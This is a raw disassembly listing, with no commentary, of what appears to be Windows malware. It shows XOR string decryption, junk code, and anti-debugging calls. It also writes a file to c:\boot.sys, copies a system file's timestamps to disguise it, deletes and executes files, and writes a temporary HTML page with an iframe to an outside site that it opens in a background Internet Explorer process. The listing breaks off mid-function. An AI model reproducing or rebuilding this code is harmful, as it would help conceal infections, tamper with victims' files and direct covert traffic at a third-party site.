loc_408097: ; CODE XREF: .text:00408091�j
mov byte ptr [ebp-1], 16h
add byte ptr [ebp-1], 1
mov eax, ds:dword_42EB94
cmp [ebp+8], eax
jz short loc_4080AD
xor eax, eax
jmp short loc_4080DD
; ---------------------------------------------------------------------------
loc_4080AD: ; CODE XREF: .text:004080A7�j
call sub_40C574 ; GetProcessHeap
lea ecx, byte_41EB90
or eax, 0FFFFFFFFh
loc_4080BB: ; CODE XREF: .text:004080C0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4080BB
mov edi, eax
add edi, 1
push edi
push offset byte_41EB90
push dword ptr [ebp+0Ch]
call sub_40C9F4
add esp, 0Ch
mov eax, 1
loc_4080DD: ; CODE XREF: .text:00408095�j
; .text:004080AB�j
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4080E0 proc near ; CODE XREF: sub_408189+21F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_441438
lea eax, ds:414490h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov [ebp+var_4], 7
xor edi, edi
jmp short loc_408126
; ---------------------------------------------------------------------------
loc_40810F: ; CODE XREF: sub_4080E0+48�j
mov eax, dword_441438
add eax, edi
lea eax, ds:414490h[eax]
movsx edx, byte ptr [eax]
xor edx, 9
mov [eax], dl
inc edi
loc_408126: ; CODE XREF: sub_4080E0+2D�j
cmp edi, esi
jl short loc_40810F
mov [ebp+var_8], 1ADh
mov eax, dword_441438
add eax, esi
mov byte ptr ds:dword_414490[eax], 0
xor edi, edi
mov edi, dword_441438
add dword_441438, 2
mov eax, dword_441438
add eax, 5
add eax, esi
mov dword_441438, eax
add dword_441438, 2
cmp dword_441438, 0DECh
jle short loc_408178
and dword_441438, 0
loc_408178: ; CODE XREF: sub_4080E0+8F�j
mov [ebp+var_C], 187h
lea eax, dword_414490[edi]
pop edi
pop esi
leave
retn
sub_4080E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408189 proc near ; DATA XREF: sub_40A766+7ED�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
call sub_40C508 ; GetCurrentProcessId
xor ebx, ebx
mov [ebp+var_4], ebx
mov [ebp+var_C], ebx
loc_40819F: ; CODE XREF: sub_408189+140�j
; sub_408189+14B�j ...
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 3Ah
jnz loc_4082B3
mov [ebp+var_D], 8Fh
add [ebp+var_D], 1
mov eax, [ebp+arg_0]
cmp byte ptr [ebx+eax+11h], 20h
jz short loc_4081C9
cmp byte ptr [ebx+eax+14h], 20h
jnz loc_4082B3
loc_4081C9: ; CODE XREF: sub_408189+33�j
call sub_40C634 ; IsDebuggerPresent
mov eax, [ebp+arg_0]
mov al, [ebx+eax+1]
cmp al, 34h
jz short loc_4081E1
cmp al, 35h
jnz loc_4082B3
loc_4081E1: ; CODE XREF: sub_408189+4E�j
mov eax, [ebp+arg_0]
cmp byte ptr [ebx+eax+11h], 20h
jnz short loc_4081F4
mov [ebp+var_4], 10h
jmp short loc_4081FB
; ---------------------------------------------------------------------------
loc_4081F4: ; CODE XREF: sub_408189+60�j
mov [ebp+var_4], 13h
loc_4081FB: ; CODE XREF: sub_408189+69�j
mov [ebp+var_5], 0
xor esi, esi
jmp loc_408286
; ---------------------------------------------------------------------------
loc_408206: ; CODE XREF: sub_408189+100�j
call sub_40C538 ; RtlGetLastWin32Error
cmp [ebp+var_4], 13h
jnz short loc_40824E
lea eax, [ebx+esi+1]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 2Dh
jnz short loc_40824E
mov edi, 5
mov edx, esi
inc edx
mov [ebp+var_1C], edx
mov [ebp+var_14], edi
mov eax, edx
mov [ebp+var_18], eax
mov ecx, edi
xor edx, edx
div ecx
mov [ebp+var_20], eax
mov eax, edi
mov edi, [ebp+var_20]
mul [ebp+var_20]
mov [ebp+var_24], eax
mov edi, [ebp+var_1C]
mov edx, eax
cmp edx, edi
jz short loc_408285
loc_40824E: ; CODE XREF: sub_408189+86�j
; sub_408189+93�j
call sub_40C634 ; IsDebuggerPresent
lea eax, [ebx+esi+1]
mov edx, [ebp+arg_0]
mov al, [edx+eax]
cmp al, 30h
jl short loc_408265
cmp al, 39h
jle short loc_408267
loc_408265: ; CODE XREF: sub_408189+D6�j
jmp short loc_4082B3
; ---------------------------------------------------------------------------
loc_408267: ; CODE XREF: sub_408189+DA�j
call sub_40C5A4 ; GetVersion
movzx eax, [ebp+var_5]
lea edx, [ebx+esi+1]
mov ecx, [ebp+arg_0]
mov dl, [ecx+edx]
mov ds:byte_432F00[eax], dl
add [ebp+var_5], 1
loc_408285: ; CODE XREF: sub_408189+C3�j
inc esi
loc_408286: ; CODE XREF: sub_408189+78�j
cmp esi, [ebp+var_4]
jb loc_408206
mov eax, [ebp+var_4]
mov ds:byte_432F00[eax], 0
call sub_401334
or eax, eax
jz short loc_4082AA
call sub_40C514 ; GetCurrentThreadId
jmp short loc_4082B3
; ---------------------------------------------------------------------------
loc_4082AA: ; CODE XREF: sub_408189+118�j
mov [ebp+var_C], 1
jmp short loc_40830A
; ---------------------------------------------------------------------------
loc_4082B3: ; CODE XREF: sub_408189+1D�j
; sub_408189+3A�j ...
inc ebx
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jz short loc_408306
call sub_40C634 ; IsDebuggerPresent
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 3Ch
jnz loc_40819F
cmp byte ptr [ebx+eax+1], 46h
jnz loc_40819F
cmp byte ptr [ebx+eax+2], 4Fh
jnz loc_40819F
cmp byte ptr [ebx+eax+3], 52h
jnz loc_40819F
cmp byte ptr [ebx+eax+4], 4Dh
jnz loc_40819F
cmp byte ptr [ebx+eax+5], 5Fh
jnz loc_40819F
loc_408306: ; CODE XREF: sub_408189+132�j
and [ebp+var_C], 0
loc_40830A: ; CODE XREF: sub_408189+128�j
cmp [ebp+var_C], 0
jz short loc_40831F
mov eax, ds:dword_42EB94
mov dword_43B214, eax
jmp loc_4083E0
; ---------------------------------------------------------------------------
loc_40831F: ; CODE XREF: sub_408189+185�j
mov word ptr [ebp+var_18], 69C0h
movzx eax, word ptr [ebp+var_18]
imul eax, 3F8Fh
mov word ptr [ebp+var_18], ax
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_40E010
call sub_40C67C ; CreateFileA
mov [ebp+var_14], eax
call sub_40C508 ; GetCurrentProcessId
push 2
push 0
push 0
push [ebp+var_14]
call sub_40C6AC ; SetFilePointer
mov byte ptr [ebp+var_1C+3], 2Ah
add byte ptr [ebp+var_1C+3], 1
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_408372: ; CODE XREF: sub_408189+1EE�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_408372
mov edi, eax
push 0
lea edx, [ebp+var_20]
push edx
push edi
push [ebp+arg_0]
push [ebp+var_14]
call sub_40C730 ; WriteFile
mov word ptr [ebp+var_18+2], 73F4h
movzx eax, word ptr [ebp+var_18+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_18+2], ax
push 2
push offset byte_445F8B
call sub_4080E0
add esp, 8
push 0
lea edi, [ebp+var_20]
push edi
mov edi, 0Dh
sub edi, dword_441434
push edi
push eax
push [ebp+var_14]
call sub_40C730 ; WriteFile
call sub_40C514 ; GetCurrentThreadId
push [ebp+var_14]
call sub_40C55C ; CloseHandle
mov byte ptr [ebp+var_1C+2], 24h
add byte ptr [ebp+var_1C+2], 36h
loc_4083E0: ; CODE XREF: sub_408189+191�j
pop edi
pop esi
pop ebx
leave
retn
sub_408189 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4083E5 proc near ; CODE XREF: sub_40847D+7F�p
; sub_4085D0+E8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 34Dh
push esi
push [ebp+arg_0]
mov eax, dword_445448
lea eax, ds:40D000h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_40842D
; ---------------------------------------------------------------------------
loc_408413: ; CODE XREF: sub_4083E5+4A�j
mov eax, dword_445448
add eax, edi
lea eax, ds:40D000h[eax]
movsx edx, byte ptr [eax]
xor edx, 0C8h
mov [eax], dl
inc edi
loc_40842D: ; CODE XREF: sub_4083E5+2C�j
cmp edi, esi
jl short loc_408413
mov eax, dword_445448
add eax, esi
mov byte ptr ds:dword_40D000[eax], 0
mov edi, dword_445448
mov eax, edi
add eax, 2
add eax, esi
mov dword_445448, eax
add dword_445448, 2
cmp dword_445448, 0E0Bh
jle short loc_40846C
and dword_445448, 0
loc_40846C: ; CODE XREF: sub_4083E5+7E�j
mov [ebp+var_8], 16Bh
lea eax, dword_40D000[edi]
pop edi
pop esi
leave
retn
sub_4083E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40847D proc near ; CODE XREF: sub_4085D0+A4�p
var_239 = byte ptr -239h
var_238 = dword ptr -238h
var_232 = word ptr -232h
var_230 = byte ptr -230h
var_228 = byte ptr -228h
var_220 = byte ptr -220h
var_218 = byte ptr -218h
var_213 = byte ptr -213h
var_10E = word ptr -10Eh
var_10C = word ptr -10Ch
var_10A = word ptr -10Ah
var_107 = byte ptr -107h
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 23Ch
push ebx
push esi
push edi
mov [ebp+var_2], 149Fh
sub [ebp+var_2], 654Ch
lea edi, [ebp+var_218]
lea esi, aMvwp ; "Mwp"
mov ecx, 5
rep movsb
mov [ebp+var_10A], 1680h
sub [ebp+var_10A], 13D8h
push 104h
lea eax, [ebp+var_213]
push eax
call sub_40C580 ; GetSystemDirectoryA
mov [ebp+var_10C], 696Dh
sub [ebp+var_10C], 0DF2h
lea eax, [ebp+var_213]
push eax
lea eax, [ebp+var_107]
push eax
call sub_40C4B8
call sub_40C598 ; GetTickCount
push 0Dh
push offset byte_445F7D
call sub_4083E5
push eax
lea edi, [ebp+var_107]
push edi
call sub_40CA54
add esp, 10h
push 0
push 0
push 3
push 0
push 0
push 80000001h
lea eax, [ebp+var_107]
push eax
call sub_40C67C ; CreateFileA
mov ebx, eax
mov [ebp+var_10E], 5E47h
sub [ebp+var_10E], 6CA2h
cmp ebx, 0FFFFFFFFh
jz loc_4085CB
mov [ebp+var_232], 5F48h
movzx eax, [ebp+var_232]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_232], ax
lea eax, [ebp+var_230]
push eax
lea eax, [ebp+var_228]
push eax
lea eax, [ebp+var_220]
push eax
push ebx
call sub_40C52C ; GetFileTime
mov [ebp+var_238], 1E63h
sub [ebp+var_238], 38B1h
lea eax, [ebp+var_230]
push eax
lea eax, [ebp+var_228]
push eax
lea eax, [ebp+var_220]
push eax
push [ebp+arg_0]
call sub_40C6B8 ; SetFileTime
mov [ebp+var_239], 0Dh
add [ebp+var_239], 54h
push ebx
call sub_40C55C ; CloseHandle
call sub_40C598 ; GetTickCount
loc_4085CB: ; CODE XREF: sub_40847D+C6�j
pop edi
pop esi
pop ebx
leave
retn
sub_40847D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4085D0 proc near ; CODE XREF: sub_40A766+A0�p
var_225 = dword ptr -225h
var_221 = byte ptr -221h
var_220 = byte ptr -220h
var_21B = word ptr -21Bh
var_219 = byte ptr -219h
var_115 = byte ptr -115h
var_109 = byte ptr -109h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_106 = word ptr -106h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 228h
push ebx
push esi
push edi
call sub_40C574 ; GetProcessHeap
call sub_40C5A4 ; GetVersion
cmp eax, 80000000h
jnb loc_408730
mov [ebp+var_106], 53DAh
inc [ebp+var_106]
lea edi, [ebp+var_115]
lea esi, aCBoot_sys ; "c:\\boot.sys"
mov ecx, 3
rep movsd
mov ax, word_44545D
mov [ebp+var_21B], ax
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_115]
push eax
call sub_40C67C ; CreateFileA
mov ebx, eax
mov [ebp+var_107], 56h
add [ebp+var_107], 1
push 0
lea eax, [ebp+var_220]
push eax
push 4001h
push offset dword_44143C
push ebx
call sub_40C730 ; WriteFile
mov [ebp+var_108], 0F0h
sub [ebp+var_108], 6
push ebx
call sub_40847D
call sub_40C508 ; GetCurrentProcessId
push ebx
call sub_40C55C ; CloseHandle
lea edi, [ebp+var_221]
lea esi, byte_44545F
xor ecx, ecx
inc ecx
rep movsb
push 104h
lea eax, [ebp+var_104]
push eax
call sub_40C580 ; GetSystemDirectoryA
mov eax, dword_445460
mov [ebp+var_225], eax
push 0Ah
push offset aAFlemcBo ; "ķ»«„¬ęø”®"
call sub_4083E5
lea edi, [ebp+var_104]
push edi
push eax
lea edi, [ebp+var_219]
push edi
call sub_40CA30
call sub_40C634 ; IsDebuggerPresent
push 1Dh
push offset dword_445F54
call sub_4083E5
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CA54
add esp, 28h
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_219]
push eax
call sub_40C760 ; DeleteFileA
mov [ebp+var_109], 0C1h
movzx eax, [ebp+var_109]
imul eax, 2ED3h
mov [ebp+var_109], al
push 0
lea eax, [ebp+var_104]
push eax
call sub_40C724 ; WinExec
call sub_40C598 ; GetTickCount
loc_408730: ; CODE XREF: sub_4085D0+1B�j
pop edi
pop esi
pop ebx
leave
retn
sub_4085D0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_4454EC
lea eax, ds:431D10h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_408775
; ---------------------------------------------------------------------------
loc_40875B: ; CODE XREF: .text:00408777�j
mov eax, dword_4454EC
add eax, edi
lea eax, ds:431D10h[eax]
movsx edx, byte ptr [eax]
xor edx, 0C3h
mov [eax], dl
inc edi
loc_408775: ; CODE XREF: .text:00408759�j
cmp edi, esi
jl short loc_40875B
mov eax, dword_4454EC
add eax, esi
mov byte ptr ds:dword_431D10[eax], 0
mov edi, dword_4454EC
add dword_4454EC, 3
mov eax, dword_4454EC
add eax, 5
add eax, esi
mov dword_4454EC, eax
cmp eax, 0E02h
jle short loc_4087B2
and dword_4454EC, 0
loc_4087B2: ; CODE XREF: .text:004087A9�j
mov dword ptr [ebp-4], 2B6h
lea eax, dword_431D10[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087C3 proc near ; CODE XREF: sub_4088D5+4A�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push edi
mov [ebp+var_1], 0A2h
add [ebp+var_1], 1
push 4
push 1000h
push [ebp+arg_0]
push 0
call sub_40C6E8 ; VirtualAlloc
jmp short loc_4087EE
; ---------------------------------------------------------------------------
mov edi, 369Ah
mov eax, edi
add eax, edi
mov edi, eax
loc_4087EE: ; CODE XREF: sub_4087C3+1E�j
pop edi
leave
retn
sub_4087C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087F1 proc near ; CODE XREF: sub_4088D5+E6�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ax, word_4454F0
mov [ebp+var_2], ax
push 8000h
push 0
push [ebp+arg_0]
call sub_40C6F4 ; VirtualFree
jmp short locret_408815
; ---------------------------------------------------------------------------
call sub_40C514 ; GetCurrentThreadId
locret_408815: ; CODE XREF: sub_4087F1+1D�j
leave
retn
sub_4087F1 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_4454FC
lea eax, ds:439340h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_408857
; ---------------------------------------------------------------------------
loc_40883D: ; CODE XREF: .text:00408859�j
mov eax, dword_4454FC
add eax, edi
lea eax, ds:439340h[eax]
movsx edx, byte ptr [eax]
xor edx, 0C3h
mov [eax], dl
inc edi
loc_408857: ; CODE XREF: .text:0040883B�j
cmp edi, esi
jl short loc_40883D
mov eax, dword_4454FC
add eax, esi
mov byte ptr ds:dword_439340[eax], 0
mov edi, dword_4454FC
add dword_4454FC, 3
mov eax, dword_4454FC
add eax, 5
add eax, esi
mov dword_4454FC, eax
cmp eax, 0E02h
jle short loc_408894
and dword_4454FC, 0
loc_408894: ; CODE XREF: .text:0040888B�j
mov dword ptr [ebp-4], 2B6h
lea eax, dword_439340[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088A5 proc near ; CODE XREF: sub_4088D5+100�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push edi
mov [ebp+var_1], 0A2h
add [ebp+var_1], 1
push offset dword_4454A4
push offset dword_445464
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BA60
mov edi, 369Ah
mov eax, edi
add eax, edi
mov edi, eax
pop edi
leave
retn
sub_4088A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088D5 proc near ; CODE XREF: sub_409847+4BC�p
var_6A = word ptr -6Ah
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_61 = byte ptr -61h
var_5E = word ptr -5Eh
var_5C = byte ptr -5Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 6Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov ax, word_445500
mov [ebp+var_5E], ax
lea edi, [ebp+var_61]
lea esi, word_445502
mov ecx, 3
rep movsb
lea edi, [ebp+var_64]
lea esi, byte_445505
mov ecx, 3
rep movsb
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_408916
add eax, 3Fh
loc_408916: ; CODE XREF: sub_4088D5+3C�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_4087C3
pop ecx
mov [ebp+var_18], eax
call sub_40C634 ; IsDebuggerPresent
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_408938
add eax, 3Fh
loc_408938: ; CODE XREF: sub_4088D5+5E�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
push [ebp+var_18]
call sub_40C6A0 ; RtlZeroMemory
call sub_40C514 ; GetCurrentThreadId
push [ebp+arg_4]
push ebx
push [ebp+var_18]
call sub_40C9F4
add esp, 0Ch
mov eax, dword_445508
mov [ebp+var_68], eax
lea eax, [ebp+var_14]
push eax
call sub_40BB9E
call sub_40C598 ; GetTickCount
mov ebx, [ebp+var_18]
and [ebp+var_4], 0
jmp short loc_4089A5
; ---------------------------------------------------------------------------
loc_40897C: ; CODE XREF: sub_4088D5+E1�j
call sub_40C508 ; GetCurrentProcessId
push ebx
lea eax, [ebp+var_14]
push eax
call sub_40BBC5
mov [ebp+var_6A], 3E0Fh
movzx eax, [ebp+var_6A]
imul eax, 4D56h
mov [ebp+var_6A], ax
add ebx, 40h
inc [ebp+var_4]
loc_4089A5: ; CODE XREF: sub_4088D5+A5�j
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_4089B0
add eax, 3Fh
loc_4089B0: ; CODE XREF: sub_4088D5+D6�j
sar eax, 6
cmp [ebp+var_4], eax
jl short loc_40897C
push [ebp+var_18]
call sub_4087F1
mov [ebp+var_1C], 5CDFh
add [ebp+var_1C], 4710h
lea eax, [ebp+var_5C]
push eax
push [ebp+arg_8]
call sub_4088A5
mov eax, dword_4454F4
add eax, 0Eh
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_5C]
push eax
call sub_40C9E8
add esp, 18h
or eax, eax
jz short loc_4089FC
xor eax, eax
inc eax
jmp short loc_408A03
; ---------------------------------------------------------------------------
loc_4089FC: ; CODE XREF: sub_4088D5+120�j
call sub_40C5A4 ; GetVersion
xor eax, eax
loc_408A03: ; CODE XREF: sub_4088D5+125�j
pop edi
pop esi
pop ebx
leave
retn
sub_4088D5 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 3D4h
push esi
push dword ptr [ebp+8]
mov eax, dword_445514
lea eax, ds:438220h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_408A4C
; ---------------------------------------------------------------------------
loc_408A35: ; CODE XREF: .text:00408A4E�j
mov eax, dword_445514
add eax, edi
lea eax, ds:438220h[eax]
movsx edx, byte ptr [eax]
xor edx, 25h
mov [eax], dl
inc edi
loc_408A4C: ; CODE XREF: .text:00408A33�j
cmp edi, esi
jl short loc_408A35
mov eax, dword_445514
add eax, esi
mov byte ptr ds:dword_438220[eax], 0
mov edi, dword_445514
mov eax, edi
add eax, 4
add eax, esi
mov dword_445514, eax
add dword_445514, 3
cmp dword_445514, 0DCBh
jle short loc_408A8B
and dword_445514, 0
loc_408A8B: ; CODE XREF: .text:00408A82�j
lea eax, dword_438220[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408A95 proc near ; CODE XREF: sub_409847+40F�p
; sub_409847+434�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_1F = byte ptr -1Fh
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov [ebp+var_16], 6062h
movzx eax, [ebp+var_16]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_16], ax
call sub_40C634 ; IsDebuggerPresent
xor eax, eax
mov [ebp+var_10], eax
mov [ebp+var_14], eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
add eax, [ebp+var_8]
mov [ebp+var_C], eax
mov ebx, [ebp+arg_0]
jmp loc_408BB9
; ---------------------------------------------------------------------------
loc_408AD9: ; CODE XREF: sub_408A95+12F�j
call sub_40C634 ; IsDebuggerPresent
movsx edi, byte ptr [ebx]
shl edi, 2
mov edi, dword_445518[edi]
mov [ebp+var_4], edi
cmp edi, 0FFFFFFFFh
jz loc_408BB8
lea edi, [ebp+var_1F]
lea esi, aJwouJ? ; "jWOu J?"
movsd
movsd
mov eax, [ebp+var_10]
or eax, eax
jl loc_408BB2
cmp eax, 3
jg loc_408BB2
jmp off_445924[eax*4]
; ---------------------------------------------------------------------------
mov eax, dword_445920
mov [ebp+var_2C], eax
loc_408B25: ; CODE XREF: sub_408A95+81�j
; DATA XREF: .data:off_445924�o
inc [ebp+var_10]
call sub_40C598 ; GetTickCount
jmp loc_408BB2
; ---------------------------------------------------------------------------
loc_408B32: ; CODE XREF: sub_408A95+81�j
; DATA XREF: .data:00445928�o
mov edi, [ebp+var_14]
shl edi, 2
mov esi, [ebp+var_4]
and esi, 30h
sar esi, 4
or edi, esi
mov edx, edi
mov [ebp+var_17], dl
mov [ebp+var_28], 6A69h
mov eax, [ebp+var_28]
mov edx, eax
add edx, eax
mov [ebp+var_28], edx
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_17]
mov [eax], dl
inc [ebp+var_10]
jmp short loc_408BB2
; ---------------------------------------------------------------------------
loc_408B69: ; CODE XREF: sub_408A95+81�j
; DATA XREF: .data:0044592C�o
mov edi, [ebp+var_14]
and edi, 0Fh
shl edi, 4
mov esi, [ebp+var_4]
and esi, 3Ch
sar esi, 2
or edi, esi
mov edx, edi
mov [ebp+var_17], dl
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_17]
mov [eax], dl
inc [ebp+var_10]
jmp short loc_408BB2
; ---------------------------------------------------------------------------
loc_408B92: ; CODE XREF: sub_408A95+81�j
; DATA XREF: .data:00445930�o
mov edi, [ebp+var_14]
and edi, 3
shl edi, 6
or edi, [ebp+var_4]
mov edx, edi
mov [ebp+var_17], dl
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_17]
mov [eax], dl
and [ebp+var_10], 0
loc_408BB2: ; CODE XREF: sub_408A95+72�j
; sub_408A95+7B�j ...
mov eax, [ebp+var_4]
mov [ebp+var_14], eax
loc_408BB8: ; CODE XREF: sub_408A95+5C�j
inc ebx
loc_408BB9: ; CODE XREF: sub_408A95+3F�j
cmp byte ptr [ebx], 0
jz short loc_408BCA
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_408AD9
loc_408BCA: ; CODE XREF: sub_408A95+127�j
cmp byte ptr [ebx], 0
jnz short loc_408BDC
call sub_40C538 ; RtlGetLastWin32Error
mov eax, [ebp+var_8]
sub eax, [ebp+arg_4]
jmp short loc_408BDF
; ---------------------------------------------------------------------------
loc_408BDC: ; CODE XREF: sub_408A95+138�j
or eax, 0FFFFFFFFh
loc_408BDF: ; CODE XREF: sub_408A95+145�j
pop edi
pop esi
pop ebx
leave
retn
sub_408A95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408BE4 proc near ; CODE XREF: sub_409847:loc_40A5BF�p
var_370 = byte ptr -370h
var_36C = byte ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_24C = byte ptr -24Ch
var_148 = dword ptr -148h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 370h
push ebx
push esi
push edi
lea eax, [ebp+var_104]
push eax
push 104h
call sub_40C58C ; GetTempPathA
lea ecx, [ebp+var_104]
or eax, 0FFFFFFFFh
loc_408C0A: ; CODE XREF: sub_408BE4+2B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_408C0A
mov esi, eax
push 8
lea ebx, [ebp+var_104]
add ebx, esi
push ebx
call sub_40170F
add esp, 8
push offset a_htm ; ".htm"
lea eax, [ebp+var_104]
push eax
call sub_40CA54
add esp, 8
push 0
push 80h
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_104]
push eax
call sub_40C67C ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_408DEA
push 2
push 0
push 0
push edi
call sub_40C6AC ; SetFilePointer
lea ecx, aHtmlIframeSrcH ; "<html><iframe src=http://kavkazcenter.c"...
or eax, 0FFFFFFFFh
loc_408C78: ; CODE XREF: sub_408BE4+99�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_408C78
mov esi, eax
push 0
lea ebx, [ebp+var_36C]
push ebx
push esi
push offset aHtmlIframeSrcH ; "<html><iframe src=http://kavkazcenter.c"...
push edi
call sub_40C730 ; WriteFile
push edi
call sub_40C55C ; CloseHandle
mov [ebp+var_364], 104h
lea eax, [ebp+var_370]
push eax
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_360]
push eax
push offset aPath ; "Path"
push offset aSoftwareMicros ; "Software\\Microsoft\\IE Setup\\Setup"
push 80000002h
call sub_4014BD
add esp, 18h
mov [ebp+var_368], eax
cmp [ebp+var_368], 0
jz loc_408DEA
push 104h
lea eax, [ebp+var_24C]
push eax
lea eax, [ebp+var_360]
push eax
call sub_40C4F0 ; ExpandEnvironmentStringsA
push offset aIexplore_exe ; "\\Iexplore.exe "
lea eax, [ebp+var_24C]
push eax
call sub_40CA54
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_24C]
push eax
call sub_40CA54
call sub_404527
mov edi, eax
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CA00
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CA00
add esp, 28h
mov [ebp+var_148], 44h
mov [ebp+var_11C], 1
mov [ebp+var_118], 1
or edi, edi
jz short loc_408D7B
lea eax, [ebp+var_148]
push eax
call sub_4045B7
pop ecx
jmp short loc_408D84
; ---------------------------------------------------------------------------
loc_408D7B: ; CODE XREF: sub_408BE4+186�j
mov [ebp+var_118], 0
loc_408D84: ; CODE XREF: sub_408BE4+195�j
lea eax, [ebp+var_25C]
push eax
lea eax, [ebp+var_148]
push eax
push 0
push 0
push 20h
push 0
push 0
push 0
lea eax, [ebp+var_24C]
push eax
push 0
call sub_40C70C ; CreateProcessA
or eax, eax
jz short loc_408DDE
push [ebp+var_258]
call sub_40C55C ; CloseHandle
push 0EA60h
call sub_40C9B8
pop ecx
push 0
push [ebp+var_25C]
